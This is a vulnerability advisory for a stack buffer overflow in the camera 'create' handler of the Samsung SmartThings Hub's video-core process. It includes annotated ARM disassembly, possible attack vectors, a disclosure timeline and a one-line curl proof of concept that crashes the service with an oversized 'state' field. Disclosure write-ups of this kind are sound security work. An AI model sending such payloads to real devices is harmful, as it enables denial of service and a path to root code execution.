### Summary
An exploitable buffer overflow vulnerability exists in the camera
"create" feature of `video-core`'s HTTP server of Samsung SmartThings
Hub. The `video-core` process incorrectly extracts the "state" field
from a user-controlled JSON payload, leading to a buffer overflow on the
stack. An attacker can send an HTTP request to trigger this
vulnerability.
### Tested Versions
Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17
### Product URLs
[https://www.smartthings.com/products/smartthings-hub](https://www.smartthings.com/products/smartthings-hub)
### CVSSv3 Score
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
### CWE
CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer
Overflow')
### Details
Samsung produces a series of devices aimed at controlling and monitoring
a home, such as wall switches, LED bulbs, thermostats and cameras. One
of those is the Samsung SmartThings Hub, a central controller which
allows an end user to use their smartphone to connect to their house
remotely and operate other devices through it. The hub board utilizes
several systems on chips. The firmware in question is executed by an
i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A
architecture.
The firmware is Linux-based, and runs a series of daemons that interface
with devices nearby via ethernet, ZigBee, Z-Wave and Bluetooth
protocols. Additionally, the `hubCore` process is responsible for
communicating with the remote SmartThings servers via a persistent TLS
connection. These servers act as a bridge that allows for secure
communication between the smartphone application and the hub. End users
can simply install the SmartThings mobile application on their
smartphone to control the hub remotely.
One of the features of the hub is that it connects to smart cameras,
configures them and looks at their livestreams. For testing, we set up
the Samsung SmartCam SNH-V6414BN on the hub. Once done, the livestream
can be displayed by the smartphone application by connecting either to
the remote SmartThings servers, or directly to the camera, if they're
both in the same subnetwork.
Inside the hub, the livestream is handled by the `video-core` process,
which uses `ffmpeg` to connect via RTSP to the smart camera in its same
local network, and at the same time, provides a streamable link on the
smartphone application.
The remote SmartThings servers have the possibility to communicate with
the `video-core` process by sending messages in the persistent TLS
connection, established by the `hubCore` process. These messages can
encapsulate an HTTP request, which `hubCore` would relay directly to the
HTTP server exposed by `video-core`. The HTTP server listens on port
3000, bound to the localhost address, so a local connection is needed to
perform this request.
We identified a vulnerable request that can be exploited to achieve code
execution on the `video-core` process, which is running as root. By
sending a POST request for the "/cameras" path, it's possible to add a
new camera to the hub.
Such request is handled by function `sub_48A14`:
.text:00048A14 sub_48A14
.text:00048A14
.text:00048A14 dest = -0x4364
.text:00048A14 var_4300= -0x4300
.text:00048A14 var_4200= -0x4200
.text:00048A14 var_4000= -0x4000
.text:00048A14 var_3E80= -0x3E80
.text:00048A14 var_3C80= -0x3C80
.text:00048A14 var_3A80= -0x3A80
.text:00048A14 var_2040= -0x2040
.text:00048A14 arg_0 = 4
.text:00048A14 buffer = 8
.text:00048A14 arg_8 = 0xC
.text:00048A14 arg_10 = 0x14
.text:00048A14
.text:00048A14 000 MOV R12, #:lower16:dword_C4DCC
.text:00048A18 000 STMFD SP!, {R4-R11,LR}
.text:00048A1C 024 MOVT R12, #:upper16:dword_C4DCC
.text:00048A20 024 ADD R11, SP, #0x20
.text:00048A24 024 SUB SP, SP, #0x4300
.text:00048A28 4324 MOV R5, R3
.text:00048A2C 4324 SUB SP, SP, #0x54
...
.text:00048A8C 4378 BL http_required_json_parameters ; [1]
.text:00048A90 4378 MOV R5, R0
.text:00048A94 4378 SUB R0, R11, #-var_4000
.text:00048A98 4378 MOV R1, R6
.text:00048A9C 4378 MOV R2, #0x2044
.text:00048AA0 4378 SUB R0, R0, #0xAC
.text:00048AA4 4378 BL memset
.text:00048AA8 4378 SUB R0, R11, #-var_4000
.text:00048AAC 4378 SUB R0, R0, #0xAC
.text:00048AB0 4378 BL clear_buffers
.text:00048AB4 4378 CMP R5, R6
.text:00048AB8 4378 BNE loc_48ADC
...
.text:00048ADC loc_48ADC
.text:00048ADC 000 MOV R0, R4
.text:00048AE0 000 BL json_tokener_parse ; [2]
.text:00048AE4 000 SUBS R5, R0, #0
.text:00048AE8 000 BEQ loc_48BEC
.text:00048AEC 000 SUB R0, R11, #-var_4000
.text:00048AF0 000 MOV R1, R5
.text:00048AF4 000 SUB R0, R0, #0xAC
.text:00048AF8 000 BL sub_48438 ; [3]
Note that the binary embeds the ["json-c"
library](https://github.com/json-c/json-c) that is used to manage JSON
objects.
The function initially calls `http_required_json_parameters` at [1] to
verify that all the required parameters are specified in the JSON
request, the parameters are: `cameraId`, `locationId`, `dni`, `url`. At
[2] the function parses the JSON payload received in the request using
`json_tokener_parse`, which returns a `json_object`. It then calls
`sub_48438` [3] passing the pointer to a local stack buffer and the
`json_object` as parameters.
.text:00048438 sub_48438
.text:00048438
.text:00048438 000 STMFD SP!, {R4-R9,LR}
.text:0004843C 01C MOV R4, R1
.text:00048440 01C SUB SP, SP, #0x244
.text:00048444 260 MOV R1, #:lower16:aCameraid_1 ; "cameraId"
.text:00048448 260 MOV R6, R0
.text:0004844C 260 ADD R2, SP, #0x260+value
.text:00048450 260 MOV R0, R4 ; jso
.text:00048454 260 MOVT R1, #:upper16:aCameraid_1 ; "cameraId"
.text:00048458 260 BL json_object_object_get_ex ; [4]
.text:0004845C 260 CMP R0, #0
.text:00048460 260 BNE loc_48488
...
.text:000485AC 260 MOV R1, #:lower16:aLocationid_0 ; "locationId"
.text:000485B0 260 STR R7, [R6,#4]
.text:000485B4 260 MOVT R1, #:upper16:aLocationid_0 ; "locationId"
.text:000485B8 260 MOV R0, R4 ; jso
.text:000485BC 260 ADD R2, SP, #0x260+value
.text:000485C0 260 BL json_object_object_get_ex ; [4]
.text:000485C4 260 CMP R0, #0
.text:000485C8 260 BNE loc_48638
...
.text:000486FC 260 MOV R1, #:lower16:aDni ; "dni"
.text:00048700 260 STR R7, [R6,#0x208]
.text:00048704 260 MOVT R1, #:upper16:aDni ; "dni"
.text:00048708 260 MOV R0, R4 ; jso
.text:0004870C 260 ADD R2, SP, #0x260+value
.text:00048710 260 BL json_object_object_get_ex ; [4]
.text:00048714 260 CMP R0, #0
.text:00048718 260 BNE loc_48790
...
.text:00048850 260 MOV R1, #:lower16:aUrl_0 ; "url"
.text:00048854 260 STR R7, [R6,#0x40C]
.text:00048858 260 MOVT R1, #:upper16:aUrl_0 ; "url"
.text:0004885C 260 MOV R0, R4 ; jso
.text:00048860 260 ADD R2, SP, #0x260+value
.text:00048864 260 BL json_object_object_get_ex ; [4]
.text:00048868 260 CMP R0, #0
.text:0004886C 260 BNE loc_488DC
...
.text:00048938 260 MOV R1, #:lower16:aState ; "state"
.text:0004893C 260 STR R0, [R6,#0xE24]
.text:00048940 260 MOVT R1, #:upper16:aState ; "state"
.text:00048944 260 STRH R3, [R12,#0xC]
.text:00048948 260 MOV R0, R4 ; jso
.text:0004894C 260 STRB LR, [R6,#0xE2E]
.text:00048950 260 BL json_object_object_get_ex ; [4]
.text:00048954 260 CMP R0, #0
.text:00048958 260 BNE loc_489E0
...
.text:000489E0 loc_489E0
.text:000489E0 260 LDR R0, [SP,#0x260+value]
.text:000489E4 260 BL json_object_to_json_string ; [5]
.text:000489E8 260 MOV R7, R0
.text:000489EC 260 BL strlen ; [6]
.text:000489F0 260 MOV R4, R0
.text:000489F4 260 ADD R0, R6, #0x810
.text:000489F8 260 MOV R1, R7
.text:000489FC 260 MOV R2, R4
.text:00048A00 260 ADD R0, R0, #8
.text:00048A04 260 BL memcpy ; [7]
The purpose of this function is to extract each parameter and store it
in the buffer passed as argument. Each parameter is extracted using the
following sequence:
- Call to `json_object_object_get_ex` [4] and `json_object_to_json_string` [5] for extracting a parameter by key name.
- Copy the parameter value in a buffer on the stack, using `strlen` [6] and `memcpy` [7].
Additionally, before calling `memcpy`, the parameters "cameraId",
"locationId" and "dni" are verified using regular expressions, and the
"url" parameter is simply truncated to a maximum length of 0x200.
However, the "state" parameter is not sanitized in any way. In fact, we
can see that the `length` value for the `memcpy` call [7] is set from
the `strlen` [6] output of the source string itself. At high level this
would be:
memcpy(stack_buffer, state, strlen(state));
Since `state` is controlled by the user, there is no restriction on the
length of the copy operation, which allows for overflowing the stack
buffer, and potentially arbitrary code execution.
We identified two different vectors that allow for exploiting this
vulnerability:
- Anyone able to impersonate the remote SmartThings servers can send
arbitrary HTTP requests to `hubCore` that would be relayed without
modification to the vulnerable `video-core` process.
- SmartThings SmartApps allow for creating custom applications that
can be either published directly into the device itself, or on the
public marketplace. A SmartApp is executed inside the `hubCore`
process, and is allowed to make any localhost connection. It is thus
possible for a SmartApp to send arbitrary HTTP requests directly to
the vulnerable `video-core` process.
A third vector might exist, but we decided not to test it to avoid
damaging any live infrastructure. This would consist of sending a
malicious request from the SmartThings mobile application to the remote
SmartThings servers. In turn, depending on the remote APIs available,
the servers could relay the malicious payload back to the device via the
persistent TLS connection. To use this vector, an attacker would need to
own a valid OAuth bearer token, or the relative username and password
pair to obtain it.
### Exploit Proof of Concept
The following proof of concept shows how to crash the `video-core`
process:
$ curl -X POST "http://127.0.0.1:3000/cameras" -d '{"cameraId":"00000000-0000-0000-0000-000000000000","locationId":"00000000-0000-0000-0000-000000000000","dni":"000000000000","url":"x","state":"'$(perl -e 'print "A"x700')'"}'
### Timeline
* 2018-04-16 - Vendor Disclosure
* 2018-05-23 - Discussion with vendor/review of timeline for disclosure
* 2018-07-17 - Vendor patched
* 2018-07-26 - Public Release
暂无评论